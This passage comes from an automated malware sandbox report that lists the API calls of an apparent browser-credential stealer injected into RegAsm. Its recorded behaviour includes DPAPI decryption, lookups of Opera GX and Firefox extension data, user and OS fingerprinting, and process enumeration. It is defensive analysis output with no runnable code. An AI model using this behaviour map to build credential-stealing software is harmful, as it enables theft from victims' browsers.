                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417518
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041752F
                                                                                      • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417540
                                                                                      • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417551
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,0042656F), ref: 0040FBD7
                                                                                      • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,0042656F), ref: 0040FBDE
                                                                                      • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004172D5
                                                                                    • Sleep.KERNEL32(00001B58), ref: 004172E0
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00426AC0,?,00000000,0042656F), ref: 004172F1
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00417307
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00417315
                                                                                    • ExitProcess.KERNEL32 ref: 0041731C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoadlstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologNameOpenSleepUserlstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 1043047581-0
                                                                                    • Opcode ID: 63899c68169e41570f029a222e57a0ca82ee8ba73f8e0d272385d8930f0730d7
                                                                                    • Instruction ID: 5fe09bd252f0d150a6d3d00478baf6c0c38f56ac8277075a71d8cdb1780555ff
                                                                                    • Opcode Fuzzy Hash: 63899c68169e41570f029a222e57a0ca82ee8ba73f8e0d272385d8930f0730d7
                                                                                    • Instruction Fuzzy Hash: 45112C71900019BBCB11FBA2DD6ADEEB77DAE55304B50007EB502B24E1DF386A09CA69
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00403A59
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                    • InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CrackH_prologInternetlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 503950642-0
                                                                                    • Opcode ID: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
                                                                                    • Instruction ID: cc07c141d42f95622a17f2cc37de93049e7409e5d01b43fa4466afa553a2edca
                                                                                    • Opcode Fuzzy Hash: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
                                                                                    • Instruction Fuzzy Hash: B4114C71D00208ABCB24AFA5D805BDE7F78AF45325F20422AF921A62D0DB385A498B54
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040B1E5
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00425ED8,00425BE3), ref: 0040B2A6
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040B2C2
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040AFAF: _EH_prolog.MSVCRT ref: 0040AFB4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                    • API String ID: 2813378046-3310892237
                                                                                    • Opcode ID: 384d4e0ce00402dfda07b866f8a0d6dbf308a042ebcec32dbebc7ac094264ded
                                                                                    • Instruction ID: 4f6f4bd48829af219670311540be59081c9cea49b359b7f79f2b82a8f20ba16d
                                                                                    • Opcode Fuzzy Hash: 384d4e0ce00402dfda07b866f8a0d6dbf308a042ebcec32dbebc7ac094264ded
                                                                                    • Instruction Fuzzy Hash: F6715D70905248AACB14FBE5D516BDDBBB4AF19308F50417EE805736C2DB78670CCB66
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004064EA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00425B44,?,?,?,00425B3F,?), ref: 004065A7
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                    • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00425B48,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00425B43), ref: 0040661F
                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 0040663A
                                                                                    Strings
                                                                                    • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040659B, 004065A0, 004065BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                    • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                    • API String ID: 757424748-1193256905
                                                                                    • Opcode ID: f6ce9d2092b8488091eba00a9cdcecb47d6563a634a2b248d5590a137b97323b
                                                                                    • Instruction ID: b62f1dd5ee535d8e5f8645b721c07d1aad3572f7288e272c7e543ebc5a1b68b9
                                                                                    • Opcode Fuzzy Hash: f6ce9d2092b8488091eba00a9cdcecb47d6563a634a2b248d5590a137b97323b
                                                                                    • Instruction Fuzzy Hash: 7B617170801544EECB25EBA4EA15AEDBBB5EB28304F10507EE506736E2DB381A09CF65
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040C18B
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE
                                                                                      • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                      • Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                      • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                      • Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                    • memcmp.MSVCRT ref: 0040C21C
                                                                                      • Part of subcall function 004062A5: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                      • Part of subcall function 004062A5: LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                      • Part of subcall function 004062A5: LocalFree.KERNEL32(?), ref: 004062FE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                    • String ID: $DPAPI
                                                                                    • API String ID: 2477620391-1819349886
                                                                                    • Opcode ID: 7fde57cfb3e23f25c5826063d9561d751b6fe279c762ca7b9769f1475c596470
                                                                                    • Instruction ID: 8b9103f373224ef9c7d1e1e34525f01fb5e997a78b4ac406efbcf79e04d5bcd8
                                                                                    • Opcode Fuzzy Hash: 7fde57cfb3e23f25c5826063d9561d751b6fe279c762ca7b9769f1475c596470
                                                                                    • Instruction Fuzzy Hash: 8B21A272D00109ABCF10ABE5CD42AEFBB79AF54314F14027BF901B11D2EA399A958699
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?), ref: 00410694
                                                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000), ref: 004106B0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID: Windows 11
                                                                                    • API String ID: 3676486918-2517555085
                                                                                    • Opcode ID: 5f1e27fdb62b933d2b61b99a876454972edf3bd6176160e80f00ebf938befaf3
                                                                                    • Instruction ID: 104df8f2525a0fd679668ea989e6de38b513391d3ca0bb797f84468fdfaa6df1
                                                                                    • Opcode Fuzzy Hash: 5f1e27fdb62b933d2b61b99a876454972edf3bd6176160e80f00ebf938befaf3
                                                                                    • Instruction Fuzzy Hash: 19F06279640215FBEB209BD1DD0AFAA7A7EEB49B04F201075FB01E61A0D7B49A509B24
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000), ref: 0040FB64
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC), ref: 0040FB6B
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ), ref: 0040FB89
                                                                                    • RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000), ref: 0040FBA4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID: CurrentBuildNumber
                                                                                    • API String ID: 3676486918-1022791448
                                                                                    • Opcode ID: b9bf53c9aadd1465afb422ec0005ef8ef59a9f86fcd7e1a7c6fd75589dd59d58
                                                                                    • Instruction ID: 38c23b2a009fde1c93731900e80abf8fdc92a9d8531a5489515771ffac6c83d0
                                                                                    • Opcode Fuzzy Hash: b9bf53c9aadd1465afb422ec0005ef8ef59a9f86fcd7e1a7c6fd75589dd59d58
                                                                                    • Instruction Fuzzy Hash: 20F03076240214FBFB109BD1DC0FFAE7A7EEB45B44F101069F701A50A0D7B569409B24
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00409143
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425DB4,?,?,?,00425B9B,00000000), ref: 0040921D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004093E4
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004093F8
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040947A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                    • String ID:
                                                                                    • API String ID: 3423466546-0
                                                                                    • Opcode ID: 11db608995ccd72e57995140e9430edd233334ab05fc65fed0a96f20b0681f76
                                                                                    • Instruction ID: 49701c4b31c8d318cf39a30ad3edccb9fb9ad7eb1a88c61520d5ae36ab01da66
                                                                                    • Opcode Fuzzy Hash: 11db608995ccd72e57995140e9430edd233334ab05fc65fed0a96f20b0681f76
                                                                                    • Instruction Fuzzy Hash: 64B14A71904248EACB15EBE4D965BDDBBB4AF28308F54407EE406735C2DB782B0DDB26
                                                                                    APIs
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6CC4C947
                                                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CC4C969
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6CC4C9A9
                                                                                    • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CC4C9C8
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CC4C9E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocInfoSystem$Free
                                                                                    • String ID:
                                                                                    • API String ID: 4191843772-0
                                                                                    • Opcode ID: cbc0b3ac0dd6c7632f84ec0c944eb9480f917d19491a2713eb1c4f9d20d1458c
                                                                                    • Instruction ID: 60f21c85aeb019d5848d221ca7b1e7ce2efbc21e33a6eafe329d22d99e633b92
                                                                                    • Opcode Fuzzy Hash: cbc0b3ac0dd6c7632f84ec0c944eb9480f917d19491a2713eb1c4f9d20d1458c
                                                                                    • Instruction Fuzzy Hash: 8F21F935741614BBDB04AEB9DCD4BAE73B9BB46704F50852AF903A7B40FB705C048794
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004102C8
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                                    • Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                                    • CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 599723951-0
                                                                                    • Opcode ID: 2fc1f2962bdb036bcc7fb993ace66804accd746089eb9d5784e12931c34da8f2
                                                                                    • Instruction ID: a4a97019f206722b2e8740589aebd7bc91867f573d1150960a86d602fc248a9b
                                                                                    • Opcode Fuzzy Hash: 2fc1f2962bdb036bcc7fb993ace66804accd746089eb9d5784e12931c34da8f2
                                                                                    • Instruction Fuzzy Hash: 23210CB1A00118EBCB10EFA5CD55AEEBBB9AF58348F50407EE405F3691CB785A488B65
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 004024F0
                                                                                      • Part of subcall function 0040245C: memset.MSVCRT ref: 00402481
                                                                                      • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                                                                      • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                                                                    • strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402505
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402510
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00402517
                                                                                      • Part of subcall function 00402308: ??_U@YAPAXI@Z.MSVCRT ref: 0040238D
                                                                                    • memset.MSVCRT ref: 00402540
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 3248666761-0
                                                                                    • Opcode ID: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                                    • Instruction ID: 5936fd312f401cb4099e43ed518250dd8d8a99da873d70e406837ce1c28814d2
                                                                                    • Opcode Fuzzy Hash: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                                    • Instruction Fuzzy Hash: BCF044B6C0021CB7CB10BBA4DD49FCA777C9F14304F0000A6BA45F2081DAB497C4CBA4
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040D6C0
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX,00425BC6,00425BC3,?,?,?), ref: 0040D70A
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                    • String ID: #$Opera GX
                                                                                    • API String ID: 2625060131-1046280356
                                                                                    • Opcode ID: 0d52e54730dc141048d375f83ad8129c69a5083a6e3fd02f50115e121cba97ed
                                                                                    • Instruction ID: 6c82463e2676cb38e72d52ba03d9db1ff071c52b99602dbfe09bc28b63ea1fae
                                                                                    • Opcode Fuzzy Hash: 0d52e54730dc141048d375f83ad8129c69a5083a6e3fd02f50115e121cba97ed
                                                                                    • Instruction Fuzzy Hash: 2A028C7190424CEADF14EBE5D956BDEBBB8AF19308F50417EE405732C2DA781B0C8B66
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041332B
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00413348
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041340C
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrlen
                                                                                    • String ID: ERROR
                                                                                    • API String ID: 2133942097-2861137601
                                                                                    • Opcode ID: 457c7dca167f6097eb3decf56045153080dc014ab3c7bbf54f3f61cdd9435eba
